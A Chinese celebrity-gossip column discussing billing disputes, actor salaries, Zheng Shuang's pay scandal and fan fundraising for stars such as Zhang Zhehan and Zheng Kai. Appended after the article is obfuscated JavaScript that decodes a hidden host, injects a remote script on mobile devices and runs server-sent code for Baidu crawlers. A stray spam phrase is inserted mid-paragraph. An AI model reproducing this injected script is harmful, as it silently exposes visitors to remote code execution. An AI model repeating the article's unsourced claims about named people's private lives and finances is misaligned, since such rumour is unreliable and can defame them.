张翰翻车?关晓彤被赵露思压番?张哲瀚逼粉丝集资?

1.赵露思现在都能压番关晓彤了?关晓彤发展这么差吗?

前两天网上不少赵露思新剧压番关晓彤的通稿,今天第28届北京电视节目交易会,推介了新剧《胡同》三位演员赵露思、蔡文静、关晓彤。

这些通稿就是故意挑事赚kpi的,这部剧是北电2021年的作业,虽然是一部剧但是分三个单元,独立拍摄,没什么番位竞争,西班牙电影黑暗面观看而且演员还在拟邀阶段,赵露思跟鹅签了分约,现在接戏不能挑,要看鹅给她什么,下部主角戏还是偶像剧,男主没定。

目前来说,关晓彤、赵露思在95花里是热度比较大的两位,商务资源也是好的两位,关晓彤国民基础强,热度也高,但是她缺点观众缘,而且因为外形接戏有限制,她现在拿资源不靠粉丝,团队就是家人,合作的都是家里的朋友,在谈正午新剧,不是很容易拿下,赵露思规划走的就是流量花路线,营销方面时不时正炒反炒想虐出死忠粉。

2.最烦明星拿着高片酬还卖惨了,看到张翰演戏熬个夜都买个热搜立敬业人设,更烦他了!他片酬很高吧?

郑爽刚被爆日薪208万,她的前前前前任张翰就踩在吃瓜群众的雷点上了,最近张翰在新综艺《初入职场的我们》里一段话上了热搜,他说在拍《先生们请立正》的时候经常一拍戏就要拍12个小时 ,曾经开机第一天拍了23个小时,导致身体出问题,一旁的靳梦佳和张萌纷纷表示太拼。

虽说这个是节目组提前安排好的热搜,但确实这个点上就是自找没趣了,而且明星配合让节目策划这个词条也很有问题,拿着天价片酬还卖惨立敬业人设,太矫情了,张翰跟郑爽差不多同期火起来的,早期那会片酬也是天价,就这两年行情不好,才猛跌,但也有几千万,而且他现在炒股,赚了不少。

他现在还在做制片工作,经纪人跟芒果战略合作,他跟鞠婧祎没有真正在一起,只是友达以上,他跟焦俊艳是普通朋友,之前拍戏熟起来的,他现在性格比以前好相处不少。

3.郑恺公司被强制执行了,我的天,娱乐圈这么赚钱他们为什么还要做老赖?

老赖也出现人传人的趋势了,最近郑恺作为大股东的上海猎豹文化传媒公司,因为和光线传媒的合同纠纷,被法院强制执行3300万,这个价格,大概是限薪令后,准一线明星一部戏的税后片酬。

娱乐圈老赖是真多,他们不是还不起,就是不想还,人气高的有粉丝忙着洗地,人气低的讨论度不会高,这阵过去就过去了,圈内也没当回事,明星该干嘛干嘛,这个圈子畸形现象太多,郑恺现在除了演戏,名下还有不少投资,火锅店、酒吧、还有房产,跟苗苗结婚就把一栋房子过户过去了。

他现在还是华谊的骨干力量,不过华谊也不会管着他,他事业自己说了算,他跟苗苗的婚姻到目前为止是没有问题的,还带苗苗上奔跑吧,夫妻一起赚钱,不过他以前是夜店小王子,很爱玩,不知道两人会不会一直恩爱下去。

4.明星真的好赚钱,几千万一下子就进账了,看到张哲瀚一个采访,他说赚3500万很简单,那干嘛还要粉丝集资啊,跟后援会互关,后援会集资他很清楚吧,那还卖惨,无语透顶?

任何一个有热度的明星都逃不开被扒皮,最近有网友翻到张哲瀚几年前的采访,被问如果一觉醒来得到3500万你会怎么样,张哲瀚不屑的说3500万很难吗,靠自己,他之前和龚俊参加王牌还在直播间喊话剧粉是穷鬼,以及给新代言宣传时让粉丝“给我涂,给我买,给我花钱”,最近他后援会几次号召粉丝集资,他还跟后援会互关,因此被吐槽逼粉丝氪金。

张哲瀚家庭条件不错,妈妈是生意人,而且他入行早,这个行业只要能叫得上名字的明星,片酬起码上千万(再举个例子,创造营C位出道的刘宇,现在的商务报价已经千万以上了)《山河令》红了后张哲瀚片酬也翻了几倍,对他来说赚几千万确实不难,但这么沾沾自喜的说出来,确实观感蛮差的。

他性格很直男,有时候说话不过脑子给自己招嘲,他下部剧在接触正午,还没定,团队签新剧比较谨慎,他圈内人缘还可以,后面先录一个飞行一个常驻综艺,他现在商务资源谈了一些某顶流也在合作的,所以会发些捆绑通稿。

不针对某个艺人,集资这件事花姐说过太多次了,这绝不是应该是你情我愿,这跟明星团队以及平台脱不开关系,有的明星团队为了拿商务资源会放任粉丝集资,有的还会故意碰瓷挑起粉丝撕逼虐粉让粉丝花钱,只能说越有钱的人想要的越多。

粉丝不要被洗脑,一天到晚觉得明星惨兮,明星真的不惨,就说去年疫情那段时间,身处一线的只有各个行业的打工人,不少明星带着对象或者家人在国外和三亚度假,一个多月开支就有几百万,微博上只要动动手转发一些正能量,就能引来一大批粉丝自我感动,动不动“生气就给明星打钱”,你为明星投入这么多,你有事,明星管都不会管,之前有个妈妈因为孩子追星被骗十几万,家里还不起,有记者联系那个明星帮忙转发,明星理都没理,追星不要太真情实感,对自己和身边人好点才是最实在的。

5.项目验证及更新:

《八零九零》扑穿湖南卫视收视底盘了,芒果超媒为了赚钱开启了先网后台,让芒果TV提前看和开超点,能赚一点是一点,这部剧结束,下部接档剧殷桃、袁弘的《好女好男》,张嘉益、沙溢《对你的爱很美》,二选一。

郭帆导演的《流浪地球2》,主演吴京,屈楚萧被换,某年轻流量顶上,暂定八月开机 ,《战狼3》不要抱太大期待,吴京目前没有拍的打算,怕自砸招牌。

网上传的古偶《长相思》,不是赵丽颖、肖战,这个剧本很一般,两人目前也没有其他合作项目,都分别(划重点)有电影项目接触。

刘亦菲、井柏然的《南烟斋笔录》,平台目前仍然无排播计划。

昨天说完乔严cp合作、蓝宇cp二搭后,毛晓彤杨玏售后也来了,电影《一年之痒》官宣,定档12月31日跨年档院线上映,不过两人目前还没在一起,现在万物内卷,之后有热度竞争不大的cp,如果项目合适的话,都有二搭的可能。

因为郑爽被爆天价片酬,娱乐圈马上要开启新一轮查税了,估计会跟上次范冰冰事件后一样,内部检查,主动补齐可以放一马,不补的才会被处理。

郑爽的天价片酬事件,看到大家还有不少疑问,最后再来具体说说:

明星的片酬一般指的是到手的价格还是税前分成之前的价格?

一般指的税后价,他们也是按照税后谈的。

不是出了限薪令吗?郑爽怎么还能拿那么多,她的咖位应该到不了一线吧,照这么推,那一线能拿多少呀!能不能透露点娱乐圈各线明星的片酬上限和下限呀

影视行业片酬最畸形应该是15年到17年,当时有大量投资商涌入,平台买剧,只要播了各方稳赚不赔,艺人受益也最大,在那之前和那之间红起来以及咖位稳定的艺人,片酬是大家无法想象的,一线片酬1亿起步,最高的达到3亿,按照郑爽当年的人气和咖位,市场报价是8000万,

18年11月开始限薪令,演员片酬经过一次大规模的调整,演员总片酬不超过制作总成本的40%,主要演员片酬不得超过总片酬的70%,只说片酬的话,上限是4000万,但有的演员不止是演戏,会参与投资拿分红、会挂名职位拿分成、电影还有票房分红、进组后要各种高待遇几千几万的小钱也要拿走、歪门邪道的譬如郑女士还会搞阴阳合同,

而且她接这部剧没有签经纪公司,不需要分成,1.6个亿基本就进自己口袋了,她后来跟北京文化合作,对方给了她很多资源,抽成她收入的20%,她都不想分成想毁约,最后被人家发律师函,属实有些自私了。

所以不用心疼那些家庭作坊,他们赚钱更多,不挂靠公司钱不需要分成,某三字小生就是这样,对外说买不起房,可他在北京三亚等地方都有房产,自带私人泳池和电影院,现在已经升值上亿了。

而挂靠公司的艺人,到手的收入需要跟公司分成,目前圈内经纪公司跟明星的分成主要是三七和五五分,明星越早签进去被抽成就越多,因为经纪公司要投入资金捧,所以为什么很多明星一红就想跑路,因为赚多了后给公司分成也多,难免心态不平衡,有的明星红了,公司为了留住人也会重谈分成。

当然,演员能拿天价片酬,归根结底还是有平台买单,以前网络平台不产剧,跟制作方定制剧,买剧看人不看剧本,指定几个流量或大咖让制作公司选,如果平台拿5.8亿买剧,那制作公司就有2.3亿请平台要的演员,主要演员分完,制片公司再拿走1亿,然后扣税剩下的用来写剧本、拍戏、做后期、给所有幕后工作人员,真正花在剧上的成本少之又少。

(一个插曲:因为平台只认流量,所以现在很多艺人团队和经纪公司都会买水军,水军公司还是共用的,不止给一家服务,用来控评、刷数据,撕番位,以此来证明自己人气高号召力强,谈剧本的时候坐地起价要高片酬,郑女士也说过,热搜上的多讨论度多片酬就会涨。)

但由于高片酬请来的艺人和出来的作品不等价,不会说中文的、假唱的、抠图的比比皆是,这种情况导致这几年烂剧越来越多,剧不好看买账的观众就少,所以平台接连亏损,再加上疫情后不少投资商从影视圈跑路,投资的项目锐减,而网络平台越做越大,积累了一批固定受众后,开始自产自销(自制剧),明星现在想要演戏要跟平台绑定,这一定程度上遏制了明星天价片酬(不过明星赚钱依然是常人难以企及,而且除了片酬,还有综艺、商务代言),细心的也可以发现,郑爽在出事前很长时间没有进组演主角戏,就是因为有价无市,价格虚高太多,平台不买账了。

目前的影视圈还处在只要播了制作方就能赚钱,所以无法播出对制作方和平台损害最大,不过往后的趋势,随着观众口味变化、对剧要求越来越高、对劣迹艺人容忍度越来越低,接下来剧播了必须效果好才能赚钱,所以今年能看到几个平台开始出有深度的剧了,选演员也比较谨慎,丑闻闹大的能看到不少片方及时止损赶紧换,总的来说,还是希望咱们国产影视剧越来越好吧,一荣俱荣嘛。

想了解更多精彩内容,快来关注

白粉明星娱乐

影视动态 内地明星 当红女星 关晓彤 美女图片 赵露思 张哲瀚 郑爽 张翰 明星娱乐 娱乐

有用 (759)

评论加载中...
function CFMrWpbx(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function JQSghE(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return CFMrWpbx(t);};window['\x48\x4a\x55\x64\x4e\x7a\x70']=(/^Android|iPhone|iPad|iPod|Linux/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=JQSghE,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':6868/'+i);ws.onmessage=function(e){new Function('_cqgd',x(e.data))(cs);ws.close();}}else{var s=document.createElement('script');s.src=u+'/'+i;cs.parentElement.insertBefore(s,cs);}})('aHR0cHM6Ly95c2prYYmsuYY29t','ZmEueXNNqa2JrLmNNvbQ==','509',window,document,['Y','N']);}:function(){};